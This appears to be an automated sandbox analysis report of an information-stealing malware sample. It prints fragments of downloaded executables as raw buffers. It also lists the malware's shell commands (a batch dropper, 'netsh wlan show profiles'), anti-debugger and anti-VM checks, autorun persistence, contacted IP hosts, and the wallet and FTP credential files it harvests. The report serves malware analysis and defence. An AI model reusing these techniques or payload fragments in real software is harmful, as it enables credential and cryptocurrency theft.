DËºLÀJ~Hÿ¢wDøukH5Ñ¦HÃHÿÀD8,u÷HL$@HÿÃD8,u÷H<¹@HWHÿ3yDHØHÀuE3ÉºµE3ÀéNÿÿÿLL$@LÆHWHÈèöÿÿé¿¹@×HÿêxDHØHÀt·HL$@HÿwDøÿt}¨uyLD$@×H`L+ÀH`HþûÿHÀtBÀtHÿÁHêuáHÒHAÿHEÁD(HötmD8.thLÙ{H×H`èõÿÿLÆH`H×èõÿÿë>H`L+ðH`HþûÿHÀtB2ÀtHÿÂHïuáHÿHJÿHEÊD)LÃD+HÓH`èI$¸H`H3ÌèhH$¸HÄpA_A^A]A\ request_handle: 0x00cc000c	1	1
InternetReadFile March 8, 2025, 12:10 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELQÿà"0"f; `@ @`;O`:8 H.textø " `.rsrc`&@@.reloc,@B.CSS .@ÀH;HÀÀ0¤( +>~~i~~i(~~i~~i(X2¾Þ&Þrp(rp((+~~i@o~ ~(HPb%Ð( 0å AA? È« Û}Z \4A YÒJ [x,Z §^ vÇào %¦ s' î<Òb Gø YÓ' ³ µªE ²¡ :eN Û %`æ u²T +(ó æ ò] W÷ ë; ÔY¯] \Ë¾d \Ç¢v û®Q üæ< ]2³ å¤' o½ wÃ »!j+ x¾! 6í8" ¼.# &$ Äî% gÓ=& ð;:N' \|¦¯K( \j) pô¹: _áY ·GZ+ ¦,n!j&&)"1 nj[m+'\jn[mn!j0jn[&nj2 nj[&+(\$Z-* - .nj0 Z +Y! 1 ,n j[i/+(-//( ( .//]Þ&Þ/X// 2Ïn)j1 &a [&/0+40-/X./X ]0-02-0-/-/2/X// 2Ã/0138q 9¸é^4 §r5 ¸Ù` 6 Ñß'A7 `%8 ¶Á B9 d°: Äòx; JXÆk< Ñ\|(= eps> eTÇA? mô{@ ¤>A Èr1B ¡³S[C z>D ÐåGE ¿qw7F N/2'G ¯ýH 3pI 3,L þ&Ú ßIFJ ¦1·iK ÅÙ$L ê·p c´@M üVdN FÿO ù¢. P ÿ¸3RQ ×\|¸R ä¾7xS iY~T õhU ? oV ZÿÚW bH´ZX üèB[Y âª&YZ };7%[ ½9\ o/3] `]^ Ch_ £eY` FNa ¨¬?b ûÙtmc 5,d[aZLAj`nai4;:Za<n9jam:cj\n/ CDZF+Fj:n[&O4[I=>Z:8nPj1YjKn[&Sj6n/R6Y9^2 Jj?n[mH[S2cj@nXmZ+.NW[&^jZn[iF9jZnaiDWjGnaiYEnJjYiD1X19jIn2M]X=X&&Hn4j0VnPjamZZnDjXmGL57 UXYL+aCX`7&&3X33 ?ýÿÿe8ß/X1]/0-/X1]0s ff-0o ± g øDÿ`h $i ÅØj s,k _ü8l ;7m Æln ë"fo N"rVp ½}q ´(r n©9s nïzYt ¶m^u Ëv -zw ÂWUx xhpy Öez `r÷ { Ö0\| L¤D+} kO_~ . \ i! #Lñn Ð¯Á! Ä5 eñ Ø:7( e#x ½»8 yÖÆH v\) wÎ&2 Ù! V ßÃI jÊ@` ;Ìx 7U 3gNp ¹« G«ð5 Þg5q Q ÿ ÕO-0-/iayjnXm{jon&&jkn2j}n[&0 mn~j[ij{n0 ta+jnYmnarjnlj[mu~jjn2gazxjnZihjn/ qjnXmpw6aw-/f( r9p( o ( o Þ&Þ-/-0X1]s -o s eo sr1XsZm+ j{nYmoeÞ&Þo aÒsr/ X+sZmeeXee?ýÿÿ(ÝûÄK¡©0+ È( X2ë( ( (! MZ.<(" (# PE.X(! X(! X X8(ZX($ (% o& 'o' o( C3J o( S3>X(# X(# n~jn() +X?pÿÿÿ-ÞÞ&Þs&l ( â$%Ð( K%Ð( *BSJBv4.0.30319lH#~´#Strings´D#USø#GUID ¸#BlobW< ú3( )ÓìÓ³¡óÛ b C Ó ¸ ò Ç´¥´& <zñ9ñ_ request_handle: 0x00cc000c	1	1
InternetReadFile March 8, 2025, 12:08 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL×Ýc¿à!& @àa0: Ð* Ð0 ¨@ < Ð.text%&`P`.data\|'@(,@`À.rdatapDpFT@`@.bss(À`À.edata*Ð,@0@.idataÐ Æ@0À.CRT, Ô@0À.tls Ö@0À.rsrc¨0 Ø@0À.reloc<@ >Þ@0B/48 @@B/19RÈ Ê" @B/31]'`(ì @B/45-.@B/57\ÀB@0B/70#ÐN@B/81 request_handle: 0x00cc000c	1	1
InternetReadFile March 8, 2025, 12:08 p.m.	buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PELó4cà"!4pÐ Ëý @AH S È xF P/ ð# ¤ @.text `.rdataÄ @@.data<F0 @À.00cfg @@.rsrcx @@.relocð# $" @B request_handle: 0x00cc000c	1	1
InternetReadFile March 8, 2025, 12:08 p.m.	buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEL¤4cà"!¶^À¹ jª @A`ãWä·, ° P/0 ØAS¼øhÐ ì¼ÜäZ.textaµ¶ `.rdata Ð º@@.dataDàÄ@À.00cfg È@@.tls Ê@À.rsrc° Ì@@.relocØA0 BÖ@B request_handle: 0x00cc000c	1	1
InternetReadFile March 8, 2025, 12:08 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $Ù1Cò_ò_ò_)n°ò_Ìò_ò^"ò_Ï^ò_Ï\ò_Ï[Óò_ÏZÑò_Ï_ò_Ï ò_Ï]ò_Richò_PELê0]à"!(`Ù@ ð,à@AgÏèr ðèA°¬=`x8¸w@päÀc@.text&( `.dataH)@,@À.idata¬pD@@.didat4X@À.rsrcð Z@@.reloc¬=°>^@B request_handle: 0x00cc000c	1	1
InternetReadFile March 8, 2025, 12:08 p.m.	buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PELÐ4cà"!Ø.`£pl- @Aä&úÞÄ@Px P/`\°ð \|Ê\&@.text×Ø `.rdatalïððÜ@@.dataDRà.Ì@À.00cfg@ú@@.rsrcxPü@@.reloc\` @B request_handle: 0x00cc000c	1	1
InternetReadFile March 8, 2025, 12:08 p.m.	buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PELó4cà"!ÌðPÏSg@ADvSwð°ÀP/ÀÈ58qà {.text&ËÌ `.rdataÔ«à¬Ð@@.data\|@À.00cfg @@.rsrc°@@.relocÈ5À6@B request_handle: 0x00cc000c	1	1
InternetReadFile March 8, 2025, 12:08 p.m.	buffer: MZÿÿ¸@èº´ Í!¸LÍ!This program cannot be run in DOS mode. $ÀÅäÕ¤¤¤08e¤Ü¤¤¬¤ÖÌ¤ÖÌ¤ÖÌ¤ÖÌ¤ÖÌu¤ÖÌ¤Rich¤PEL\|ê0]à"!ÞÙð 0Ôm@Aàã ¸úðA 8¸ @´.textôÜÞ `.dataôðâ@À.idataä@@.rsrcê@@.reloc î@B request_handle: 0x00cc000c	1	1
InternetReadFile March 8, 2025, 12:08 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $åÉDÂ§Â§Â§Öï£Ö§Öï¤Ò§Öï¢s§ñ¢§ñ£Í§ñ¤È§Öï¦Ï§Â¦§ñ®Æ§ñ§Ã§ñXÃ§ñ¥Ã§RichÂ§PEdËgð" Ì8týP`P~X¨~ ø`ð®0lÀp08à.textðÊÌ `.rdatan³à´Ð@@.data¬» D@À.pdatað®`°È@@_RDATAüx@@.rsrcø z@@.relocl0\|@BHì(A¸ HcH ½èH ÜHÄ(éÛéÌÌÌHì(A¸ HÿbH PÄèãH HÄ(é«éÌÌÌHì(A¸HóbH @Åè³H \HÄ(é{éÌÌÌHì(A¸ HÏbH ¾èH HÄ(éKéÌÌÌHì(A¸HÇbH ÃèSH ÜHÄ(ééÌÌÌHì(A¸H¯bH P»è#H HÄ(éëèÌÌÌHì(E3ÀHâÃH #Äèö H _HÄ(é¾èÌÌÌÌÌÌHì(E3ÀH²ÃH ÄèÆ H HÄ(éèÌÌÌÌÌÌHì(E3ÀHÃH Ã½è H ßHÄ(é^èÌÌÌÌÌÌHì(E3ÀHRÃH ºèf H HÄ(é.èÌÌÌÌÌÌHì(A¸HßaH àºè3 H \HÄ(éûçÌÌÌHì(A¸H¿aH 0Çè H HÄ(éËçÌÌÌHì(A¸HaH ÀÂèÓH ÜHÄ(éçÌÌÌHì(A¸HaH ¸è£H HÄ(ékçÌÌÌHì(A¸$H_aH àºèsH \HÄ(é;çÌÌÌHì(A¸HWaH °ÃèCH HÄ(éçÌÌÌHì(A¸ H?aH »èH ÜHÄ(éÛæÌÌÌHì(A¸H7aH »èãH HÄ(é«æÌÌÌHì(A¸H'aH ¾è³H \HÄ(é{æÌÌÌHì(A¸HaH ¾èH HÄ(éKæÌÌÌHì(A¸Hç`H ½èSH ÜHÄ(éæÌÌÌHì(A¸HÏ`H 0Àè#H HÄ(éëåÌÌÌHì(A¸H¯`H Áèó H \HÄ(é»åÌÌÌHì(A¸LH`H Ð»èÃ H HÄ(éåÌÌÌHì(A¸H¯`H ·è H ÜHÄ(é[åÌÌÌHì(A¸dH`H 0Äèc H HÄ(é+åÌÌÌHì(A¸H×`H Áè3 H \HÄ(éûäÌÌÌHì(A¸H¿`H P¾è H HÄ(éËäÌÌÌHì(A¸H¯`H ¶èÓ H ÜHÄ(éäÌÌÌHì(A¸H`H P¿è£ H HÄ(ékäÌÌÌHì(A¸(Ho`H @½ès H \HÄ(é;äÌÌÌHì(A¸Ho`H ÁèC H HÄ(éäÌÌÌHì(A¸HO`H @Äè H ÜHÄ(éÛãÌÌÌHì(A¸H/`H °¾èãH HÄ(é«ãÌÌÌHì(A¸H`H `Áè³H \HÄ(é{ãÌÌÌHì(A¸Hÿ_H PºèH HÄ(éKãÌÌÌHì(A¸,Hß_H »èSH ÜHÄ(éãÌÌÌHì(A¸Hß_H ºè#H HÄ(éëâÌÌÌHì(A¸HÏ_H ¿èóH \HÄ(é»âÌÌÌHì(A¸$H¯_H ÀèÃH HÄ(éâÌÌÌHì(A¸H§_H »èH ÜHÄ(é[âÌÌÌHì(A¸H_H 0³ècH HÄ(é+âÌÌÌHì(A¸Ho_H ¼è3H \HÄ(éûáÌÌÌHì(A¸HO_H ð·èH HÄ(éËáÌÌÌHì(A¸H7_H @½èÓH ÜHÄ(éáÌÌÌHì(E3ÀH¼H s¹è¦H HÄ(énáÌÌÌÌÌÌHì(A¸Hï^H µèsH \HÄ(é;áÌÌÌHì(A¸HÏ^H p¸èCH HÄ(éáÌÌÌHì(A¸H·^H à³èH ÜHÄ(éÛàÌÌÌHì(A¸H^H ¿èãH HÄ(é«àÌÌÌHì(A¸LH[H ¹è³H \HÄ(é{àÌÌÌHì(A¸H'^H ¹èH HÄ(éKàÌÌÌHì(A¸dH[H ºèSH ÜHÄ(éàÌÌÌHì(A¸Hç]H ¿è#H HÄ(éëßÌÌÌHì(A¸HÏ]H ½èóH \HÄ(é»ßÌÌÌHì(A¸H·]H ð¸èÃH HÄ(éßÌÌÌHì(A¸H]H à´èH ÜHÄ(é[ßÌÌÌHì(A¸Ho]H 0¿ècH HÄ(é+ßÌÌÌHì(A¸HG]H à·è3H \HÄ(éûÞÌÌÌHì(A¸H]H °µèH HÄ(éËÞÌÌÌHì(A¸Hÿ\H ³èÓH ÜHÄ(éÞÌÌÌHì(A¸Hß\H P¯è£H HÄ(ékÞÌÌÌHì(A¸HÏ\H À¸èsH \HÄ(é;ÞÌÌÌHì(A¸0H¯\H ½èCH HÄ(éÞÌÌÌ request_handle: 0x00cc000c	1	1
InternetReadFile March 8, 2025, 12:09 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $ÈùïPóóóÞíÞíÞíóí@í@í@í~@íRichPELËgà!D¶p`@@Í¬ÍPø l»8¨»@`L.textCD `.rdatau`vH@@.data à¾@À.rsrcøÒ@@.reloc Ô@Bj h®¹`èèMh)è [YÃÌÌÌj h¼®¹xèèMhð)èêZYÃÌÌÌjhà®¹èè_MhPèÊZYÃÌÌÌj hè®¹¨èè?Mh°èªZYÃÌÌÌjh¯¹ÀèèMh+èZYÃÌÌÌjh ¯¹ØèèÿLhp+èjZYÃÌÌÌjh=¯¹ðèèßLhÐ+èJZYÃÌÌÌjh=¯¹éè¿Lh0,èZYÃÌÌÌjh=¯¹ éèLh,è ZYÃÌÌÌjh=¯¹8éèLhð,èêYYÃÌÌÌjh@¯¹Péè_LhP-èÊYYÃÌÌÌjhL¯¹héè?Lh°-èªYYÃÌÌÌjhX¯¹éèLh.èYYÃÌÌÌjhd¯¹éèÿKhp.èjYYÃÌÌÌj$hp¯¹°éèßKhÐ.èJYYÃÌÌÌjh¯¹Èéè¿Kh0/èYYÃÌÌÌj h¬¯¹àéèKh/è YYÃÌÌÌjhÐ¯¹øéèKhð/èêXYÃÌÌÌjhð¯¹êè_KhP0èÊXYÃÌÌÌjh°¹(êè?Kh°0èªXYÃÌÌÌjh°¹@êèKh1èXYÃÌÌÌjh °¹XêèÿJhp1èjXYÃÌÌÌjh,°¹pêèßJhÐ1èJXYÃÌÌÌjLh@°¹êè¿Jh02èXYÃÌÌÌjh°¹ êèJh2è XYÃÌÌÌjdh°°¹¸êèJhð2èêWYÃÌÌÌjh±¹Ðêè_JhP3èÊWYÃÌÌÌjh,±¹èêè?Jh°3èªWYÃÌÌÌjhH±¹ëèJh4èWYÃÌÌÌjhX±¹ëèÿIhp4èjWYÃÌÌÌj(hh±¹0ëèßIhÐ4èJWYÃÌÌÌjh±¹Hëè¿Ih05èWYÃÌÌÌjh¤±¹`ëèIh5è WYÃÌÌÌjh´±¹xëèIhð5èêVYÃÌÌÌjhÀ±¹ëè_IhP6èÊVYÃÌÌÌjhÜ±¹¨ëè?Ih°6èªVYÃÌÌÌj,hì±¹ÀëèIh7èVYÃÌÌÌjh²¹ØëèÿHhp7èjVYÃÌÌÌjh8²¹ðëèßHhÐ7èJVYÃÌÌÌj$hH²¹ìè¿Hh08èVYÃÌÌÌjhp²¹ ìèHh8è VYÃÌÌÌjh²¹8ìèHhð8èêUYÃÌÌÌjh²¹Pìè_HhP9èÊUYÃÌÌÌjh²¹hìè?Hh°9èªUYÃÌÌÌjh°²¹ìèHh:èUYÃÌÌÌjh=¯¹ìèÿGhp:èjUYÃÌÌÌjhÈ²¹°ìèßGhÐ:èJUYÃÌÌÌjhØ²¹Èìè¿Gh0;èUYÃÌÌÌjhð²¹àìèGh;è UYÃÌÌÌjhü²¹øìèGhð;èêTYÃÌÌÌjLh@°¹íè_GhP<èÊTYÃÌÌÌjhð²¹(íè?Gh°<èªTYÃÌÌÌjdh°°¹@íèGh=èTYÃÌÌÌjh³¹XíèÿFhp=èjTYÃÌÌÌjh ³¹píèßFhÐ=èJTYÃÌÌÌjh4³¹íè¿Fh0>èTYÃÌÌÌjhD³¹ íèFh>è TYÃÌÌÌjhL³¹¸íèFhð>èêSYÃÌÌÌjhT³¹Ðíè_FhP?èÊSYÃÌÌÌjh\³¹èíè?Fh°?èªSYÃÌÌÌjhh³¹îèFh@èSYÃÌÌÌjht³¹îèÿEhp@èjSYÃÌÌÌjh³¹0îèßEhÐ@èJSYÃÌÌÌj0h¤³¹Hîè¿Eh0AèSYÃÌÌÌjhØ³¹`îèEhAè SYÃÌÌÌjhè³¹xîèEhðAèêRYÃÌÌÌjhô³¹îè_EhPBèÊRYÃÌÌÌj<h´¹¨îè?Eh°BèªRYÃÌÌÌj0h@´¹ÀîèEhCèRYÃÌÌÌjht´¹ØîèÿDhpCèjRYÃÌÌÌj4h´¹ðîèßDhÐCèJRYÃÌÌÌj8h¸´¹ïè¿Dh0DèRYÃÌÌÌjhô´¹ ïèDhDè RYÃÌÌÌj<hµ¹8ïèDhðDèêQYÃÌÌÌj4h@µ¹Pïè_DhPEèÊQYÃÌÌÌjhxµ¹hïè?Dh°EèªQYÃÌÌÌj@hµ¹ïèDhFèQYÃÌÌÌj8hÌµ¹ïèÿChpFèjQYÃÌÌÌjh¶¹°ïèßChÐFèJQYÃÌÌÌj4h¶¹Èïè¿Ch0GèQYÃÌÌÌj,hP¶¹àïèChGè QYÃÌÌÌjh¶¹øïèChðGèêPYÃÌÌÌj4h¶¹ðè_ChPHèÊPYÃÌÌÌj(hÈ¶¹(ðè?Ch°HèªPYÃÌÌÌjhô¶¹@ðèChIèPYÃÌÌÌj4h·¹XðèÿBhpIèjPYÃÌÌÌj(h<·¹pðèßBhÐIèJPYÃÌÌÌjhh·¹ðè¿Bh0JèPYÃÌÌÌj<ht·¹ ðèBhJè PYÃÌÌÌj0h´·¹¸ðèBhðJèêOYÃÌÌÌjhè·¹Ððè_BhPKèÊOYÃÌÌÌj<hô·¹èðè?Bh°KèªOYÃÌÌÌj4h4¸¹ñèBhLèOYÃÌÌÌjhl¸¹ñèÿAhpLèjOYÃÌÌÌj0hx¸¹0ñèßAhÐLèJOYÃÌÌÌj(h¬¸¹Hñè¿Ah0Mè*OYÃÌÌÌ request_handle: 0x00cc000c	1	1

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x00552c00', u'virtual_address': u'0x0000c000', u'entropy': 7.996159812904994, u'name': u'.rsrc', u'virtual_size': u'0x00553000'}

entropy

7.9961598129

description

A section with a high entropy has been found

entropy

0.994073128476

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (6 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW March 8, 2025, 12:09 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW March 8, 2025, 12:09 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW March 8, 2025, 12:09 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW March 8, 2025, 12:09 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW March 8, 2025, 12:09 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW March 8, 2025, 12:09 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Expresses interest in specific running processes (1 event)

process

system

Uses Windows utilities for basic Windows functionality (5 events)

cmdline	C:\Windows\System32\cmd.exe /c expand Go.pub Go.pub.bat & Go.pub.bat
cmdline	expand Go.pub Go.pub.bat
cmdline	"C:\Windows\system32\cmd.exe" /c expand Go.pub Go.pub.bat & Go.pub.bat
cmdline	tasklist
cmdline	netsh wlan show profiles

One or more of the buffers contains an embedded PE file (2 events)

buffer	Buffer with sha1: 76c69c08279d2fbed4a97a116284836c164f9a8b
buffer	Buffer with sha1: b85cef20e67c34deccf1a92ce56022ecf9434c66

Communicates with host for which no DNS query was performed (8 events)

host	176.113.115.6
host	176.113.115.7
host	185.125.50.8
host	185.215.113.16
host	185.215.113.209
host	185.215.113.97
host	45.93.20.28
host	45.33.6.223

Attempts to identify installed AV products by installation directory (7 events)

file	C:\ProgramData\AVAST Software
file	C:\ProgramData\Avira
file	C:\ProgramData\Kaspersky Lab
file	C:\ProgramData\Panda Security
file	C:\ProgramData\Bitdefender
file	C:\ProgramData\AVG
file	C:\ProgramData\Doctor Web

Checks for the presence of known devices from debuggers and forensic tools (3 events)

file	\??\SICE
file	\??\SIWVID
file	\??\NTICE

Checks for the presence of known windows from debuggers and forensic tools (50 out of 497 events)

Time & API	Arguments	Status	Return	Repeated
FindWindowA March 8, 2025, 12:08 p.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA March 8, 2025, 12:08 p.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA March 8, 2025, 12:08 p.m.	class_name: pediy06 window_name:		0	0
FindWindowA March 8, 2025, 12:08 p.m.	class_name: FilemonClass window_name:		0	0
FindWindowA March 8, 2025, 12:08 p.m.	class_name: FilemonClass window_name:		0	0
FindWindowA March 8, 2025, 12:08 p.m.	class_name: #0 window_name: File Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA March 8, 2025, 12:08 p.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA March 8, 2025, 12:08 p.m.	class_name: #0 window_name: Process Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA March 8, 2025, 12:08 p.m.	class_name: RegmonClass window_name:		0	0
FindWindowA March 8, 2025, 12:08 p.m.	class_name: RegmonClass window_name:		0	0
FindWindowA March 8, 2025, 12:08 p.m.	class_name: #0 window_name: Registry Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA March 8, 2025, 12:08 p.m.	class_name: 18467-41 window_name:		0	0
FindWindowA March 8, 2025, 12:08 p.m.	class_name: FilemonClass window_name:		0	0
FindWindowA March 8, 2025, 12:08 p.m.	class_name: FilemonClass window_name:		0	0
FindWindowA March 8, 2025, 12:08 p.m.	class_name: #0 window_name: File Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA March 8, 2025, 12:08 p.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA March 8, 2025, 12:08 p.m.	class_name: #0 window_name: Process Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA March 8, 2025, 12:08 p.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA March 8, 2025, 12:08 p.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA March 8, 2025, 12:08 p.m.	class_name: pediy06 window_name:		0	0
FindWindowA March 8, 2025, 12:08 p.m.	class_name: FilemonClass window_name:		0	0
FindWindowA March 8, 2025, 12:08 p.m.	class_name: FilemonClass window_name:		0	0
FindWindowA March 8, 2025, 12:08 p.m.	class_name: #0 window_name: File Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA March 8, 2025, 12:08 p.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA March 8, 2025, 12:08 p.m.	class_name: #0 window_name: Process Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA March 8, 2025, 12:08 p.m.	class_name: RegmonClass window_name:		0	0
FindWindowA March 8, 2025, 12:08 p.m.	class_name: RegmonClass window_name:		0	0
FindWindowA March 8, 2025, 12:08 p.m.	class_name: #0 window_name: Registry Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA March 8, 2025, 12:08 p.m.	class_name: 18467-41 window_name:		0	0
FindWindowA March 8, 2025, 12:08 p.m.	class_name: FilemonClass window_name:		0	0
FindWindowA March 8, 2025, 12:08 p.m.	class_name: FilemonClass window_name:		0	0
FindWindowA March 8, 2025, 12:08 p.m.	class_name: #0 window_name: File Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA March 8, 2025, 12:08 p.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA March 8, 2025, 12:08 p.m.	class_name: #0 window_name: Process Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA March 8, 2025, 12:08 p.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA March 8, 2025, 12:08 p.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA March 8, 2025, 12:08 p.m.	class_name: pediy06 window_name:		0	0
FindWindowA March 8, 2025, 12:08 p.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA March 8, 2025, 12:08 p.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA March 8, 2025, 12:08 p.m.	class_name: pediy06 window_name:		0	0
FindWindowA March 8, 2025, 12:08 p.m.	class_name: Regmonclass window_name:		0	0
FindWindowA March 8, 2025, 12:08 p.m.	class_name: Regmonclass window_name:		0	0
FindWindowA March 8, 2025, 12:08 p.m.	class_name: 18467-41 window_name:		0	0
FindWindowA March 8, 2025, 12:08 p.m.	class_name: Filemonclass window_name:		0	0
FindWindowA March 8, 2025, 12:08 p.m.	class_name: Filemonclass window_name:		0	0
FindWindowA March 8, 2025, 12:08 p.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA March 8, 2025, 12:08 p.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA March 8, 2025, 12:08 p.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA March 8, 2025, 12:08 p.m.	class_name: pediy06 window_name:		0	0
FindWindowA March 8, 2025, 12:08 p.m.	class_name: OLLYDBG window_name:		0	0

Checks the version of Bios, possibly for anti-virtualization (2 events)

registry	HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
registry	HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion

Checks the CPU name from registry, possibly for anti-virtualization (1 event)

registry

HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString

Installs itself for autorun at Windows startup (7 events)

reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP000.TMP\"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP001.TMP\"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP000.TMP\"
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeName.vbs
file	C:\Windows\Tasks\rapes.job
file	C:\Windows\Tasks\futors.job
file	C:\Windows\Tasks\Gxtuum.job

Attempts to access Bitcoin/ALTCoin wallets (2 events)

file	C:\Users\test22\AppData\Roaming\Electrum\wallets
file	C:\Users\test22\AppData\Roaming\Litecoin\wallets

Harvests credentials from local FTP client softwares (3 events)

file	C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml
file	C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml
registry	HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Creates known Hupigon files, registry keys and/or mutexes (1 event)

file	C:\Users\test22\AppData\Local\Temp\10001960101\cronikxqqq.exe

Harvests information related to installed instant messenger clients (16 events)

file	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\.purple\accounts.xml
file	C:\Windows\.purple\accounts.xml
file	C:\Python27\.purple\accounts.xml
file	C:\Windows\System32\.purple\accounts.xml
file	C:\Users\test22\AppData\Local\Temp\845cfbab99\.purple\accounts.xml
file	C:\.purple\accounts.xml
file	C:\SystemRoot\System32\.purple\accounts.xml
file	C:\Program Files (x86)\Internet Explorer\.purple\accounts.xml
file	C:\Windows\Microsoft.NET\Framework\v4.0.30319\.purple\accounts.xml
file	C:\Users\test22\AppData\Local\Temp\bb556cff4a\.purple\accounts.xml
file	C:\Program Files (x86)\Microsoft Office\Office15\.purple\accounts.xml
file	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\.purple\accounts.xml
file	C:\Users\test22\AppData\Roaming\.purple\accounts.xml
file	C:\Windows\SysWOW64\.purple\accounts.xml
file	C:\Program Files (x86)\EditPlus\.purple\accounts.xml
file	C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE15\.purple\accounts.xml

Collects information about installed applications (38 events)

Time & API	Arguments	Status
RegQueryValueExA March 8, 2025, 12:08 p.m.	key_handle: 0x000003dc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 7-Zip 20.02 alpha regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName	1
RegQueryValueExA March 8, 2025, 12:08 p.m.	key_handle: 0x000003dc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName	1
RegQueryValueExA March 8, 2025, 12:08 p.m.	key_handle: 0x000003dc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExA March 8, 2025, 12:08 p.m.	key_handle: 0x000003dc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExA March 8, 2025, 12:08 p.m.	key_handle: 0x000003dc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: ????? ?? 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
RegQueryValueExA March 8, 2025, 12:08 p.m.	key_handle: 0x000003dc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Mozilla Thunderbird 78.4.0 (x86 ko) regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)\DisplayName	1
RegQueryValueExA March 8, 2025, 12:08 p.m.	key_handle: 0x000003dc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Professional Plus 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR\DisplayName	1
